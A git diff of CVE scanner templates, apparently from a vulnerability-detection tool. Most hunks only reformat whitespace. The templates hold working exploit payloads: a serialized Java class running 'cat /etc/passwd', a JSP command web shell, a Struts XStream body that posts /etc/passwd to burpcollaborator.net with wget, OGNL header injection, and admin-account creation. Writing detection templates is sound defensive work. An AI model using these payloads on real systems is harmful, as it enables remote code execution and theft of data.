0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034 - - - - com.supeream.exploits.XmlExp - - - - cat /etc/passwd - - - - - - - - - - - - - - - - - - - - - - + + + + + + + 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034 + + + + com.supeream.exploits.XmlExp + + + + cat /etc/passwd + + + + + + + + + + + + + + + + + + + + + + matchers: - type: regex diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index edaaad11a4..fd2fd2781a 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -6,9 +6,9 @@ info: severity: critical description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - - https://chowdera.com/2020/12/20201229190934023w.html - - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://chowdera.com/2020/12/20201229190934023w.html + - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 tags: cve,cve2017,java,rce,deserialization requests: diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index 24936c9c92..da7a45c350 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -6,8 +6,8 @@ info: severity: critical description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - - https://www.exploit-db.com/exploits/44005 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe requests: diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index 047b8cede3..e78786d62d 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -7,10 +7,10 @@ info: tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | - By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. - This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. - However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} - Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. + This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. + However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} + Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. requests: - method: PUT @@ -19,21 +19,21 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: | - <%@ page import="java.util.*,java.io.*"%> - <% - if (request.getParameter("cmd") != null) { - out.println("Command: " + request.getParameter("cmd") + "
    "); - Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); - OutputStream os = p.getOutputStream(); - InputStream in = p.getInputStream(); - DataInputStream dis = new DataInputStream(in); - String disr = dis.readLine(); - while ( disr != null ) { - out.println(disr); - disr = dis.readLine(); - } - } - %> + <%@ page import="java.util.*,java.io.*"%> + <% + if (request.getParameter("cmd") != null) { + out.println("Command: " + request.getParameter("cmd") + "
    "); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } + %> - method: GET path: diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index 8a40ce4dc2..f9f543a9b9 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -6,10 +6,10 @@ info: severity: critical tags: cve,cve2017,solr,apache,oob,xxe reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - - https://twitter.com/honoki/status/1298636315613974532 - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 + - https://twitter.com/honoki/status/1298636315613974532 + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE requests: - raw: diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index a2b0c6451a..46cbdb8d04 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -7,9 +7,9 @@ info: description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. tags: cve,cve2017,sap,lfi reference: - - https://www.cvedetails.com/cve/CVE-2017-12637/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + - https://www.cvedetails.com/cve/CVE-2017-12637/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 + - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf requests: - method: GET diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 9b73a32f7b..6a91a097cf 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: high reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce requests: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 6ccc47bee7..87579df08b 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -7,9 +7,9 @@ info: tags: cve,cve2017,trixbox,lfi description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 + - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ + - https://sourceforge.net/projects/asteriskathome/ # vendor homepage requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 9cb67b8924..2312d8d61a 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -4,8 +4,8 @@ info: name: PreAuth RCE on Palo Alto GlobalProtect author: emadshanab,milo2012 reference: - - https://www.exploit-db.com/exploits/43342 - - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high tags: cve,cve2017,rce,vpn,paloalto,globalprotect diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 1a84749dbd..954ace9e22 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -7,8 +7,8 @@ info: severity: high tags: cve,cve2017,weblogic,oracle,rce,oob reference: - - https://hackerone.com/reports/810778 - - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + - https://hackerone.com/reports/810778 + - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 requests: - raw: diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 2a44a34b56..2003bf9c99 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -5,8 +5,8 @@ info: author: 0x_Akoko severity: low reference: - - https://blog.zsec.uk/cve-2017-3528/ - - https://www.exploit-db.com/exploits/43592 + - https://blog.zsec.uk/cve-2017-3528/ + - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect requests: diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index f69dbce79e..6063ad3685 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -7,8 +7,8 @@ info: description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - - https://www.exploit-db.com/exploits/41497 + - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - https://www.exploit-db.com/exploits/41497 requests: - method: GET diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 5d477c119a..e09313bde2 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -10,15 +10,15 @@ info: requests: - raw: - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 - Accept-Language: en - Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data - Connection: Keep-Alive - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) - Pragma: no-cache - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* + GET / HTTP/1.1 + Host: {{Hostname}} + Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 + Accept-Language: en + Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data + Connection: Keep-Alive + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + Pragma: no-cache + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* matchers: - type: word diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 6ed5ae081c..008a0df385 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -18,63 +18,63 @@ requests: headers: Content-Type: application/xml body: | - - - - 0 - - - - - - false - 0 - - - - - - wget - --post-file - /etc/passwd - burpcollaborator.net - - false - - - - - java.lang.ProcessBuilder - start - - - asdasd - - asdasd - - - - - - false - 0 - 0 - false - - false - - - - 0 - - - - - - - - - + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + burpcollaborator.net + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index cd50ef3c89..1b13402b1e 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -5,8 +5,8 @@ info: author: daffainfo severity: medium reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - - https://www.exploit-db.com/exploits/45342 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 + - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi requests: diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index a7e3337a69..f0ff1c0ca4 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -5,8 +5,8 @@ info: author: 0x240x23elu severity: critical reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - - https://www.exploit-db.com/exploits/45438 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi requests: diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 0a5c845723..9f70ac8290 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -7,8 +7,8 @@ info: description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) tags: cve,cve2018,comodo,rce reference: - - https://www.exploit-db.com/exploits/48825 - - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://www.exploit-db.com/exploits/48825 + - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 requests: - raw: diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index 297a1e31fc..bb3a606f79 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -7,7 +7,7 @@ info: description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. tags: cve,cve2018,appweb,auth-bypass reference: - - https://github.com/embedthis/appweb/issues/610 + - https://github.com/embedthis/appweb/issues/610 requests: - raw: diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index d367f5e9a6..ff40e30a68 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -6,9 +6,9 @@ info: author: pdteam severity: critical reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - - https://paper.seebug.org/1009/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 + - https://paper.seebug.org/1009/ tags: cve,cve2019,apache,rce,solr,oob requests: diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index 14eba8a50d..8527f6724d 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -9,10 +9,10 @@ info: - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - https://www.exploit-db.com/exploits/50119 description: | - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and - 7.0.0 to 7.0.93 echoes user provided data without escaping and is, - therefore, vulnerable to XSS. SSI is disabled by default. - The printenv command is intended for debugging and is unlikely to be present in a production website. + The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and + 7.0.0 to 7.0.93 echoes user provided data without escaping and is, + therefore, vulnerable to XSS. SSI is disabled by default. + The printenv command is intended for debugging and is unlikely to be present in a production website. tags: cve,cve2019,apache,xss requests: diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index c67b2a83d4..6943ee9c04 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -12,7 +12,7 @@ info: google-dork: inurl:"/timesheet/login.php" requests: - - raw: # Metod POST From login.php + - raw: # Metod POST From login.php - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 84cbe7584e..7b9df06171 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -7,9 +7,9 @@ info: severity: medium tags: cve,cve2019,phpmyadmin,csrf reference: - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET @@ -32,4 +32,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 007cdd429a..7569402a99 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -7,9 +7,9 @@ info: severity: critical tags: cve,cve2019,dlink,router,iot reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - - https://github.com/d0x0/D-Link-DIR-600M - - https://www.exploit-db.com/exploits/47250 + - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 + - https://github.com/d0x0/D-Link-DIR-600M + - https://www.exploit-db.com/exploits/47250 requests: - raw: diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index 14c565d303..dddcb93e9e 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -6,7 +6,7 @@ info: description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. reference: - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory + - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 tags: cve,cve2019,grafana diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 4bea33bbe8..c04cf98e43 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -9,7 +9,7 @@ info: tags: cve,cve2019,webmin,rce requests: - - raw: # + - raw: # - | POST /password_change.cgi HTTP/1.1 Host: {{Hostname}} diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index d1b82e8f42..bbcb4dd03f 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -6,8 +6,8 @@ info: description: | core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. reference: - - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - - https://github.com/goharbor/harbor/issues/8951 + - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ + - https://github.com/goharbor/harbor/issues/8951 tags: cve,cve2019,intrusive,harbor requests: @@ -17,7 +17,7 @@ requests: headers: Content-Type: application/json body: | - {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} + {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index a1b698f29b..3a6a05e8f2 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -14,7 +14,7 @@ requests: - "{{BaseURL}}/getcfg.php" body: | - SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a + SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a headers: Content-Type: text/xml diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 03698e2cc1..7a4d6d2413 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -6,8 +6,8 @@ info: severity: high description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 + - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob requests: diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 79f217f58c..0ee815a902 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -6,8 +6,8 @@ info: severity: high description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - - https://www.exploit-db.com/exploits/46729 + - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 + - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob requests: diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index 646c8d53ef..48af892d4f 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -10,16 +10,16 @@ info: requests: - raw: - | - POST /rest/tinymce/1/macro/preview HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 - Referer: {{Hostname}} - Content-Length: 168 - Connection: close + POST /rest/tinymce/1/macro/preview HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en-US,en;q=0.5 + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Referer: {{Hostname}} + Content-Length: 168 + Connection: close - {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} + {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index bd88faf42d..b989d29259 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -6,8 +6,8 @@ info: severity: 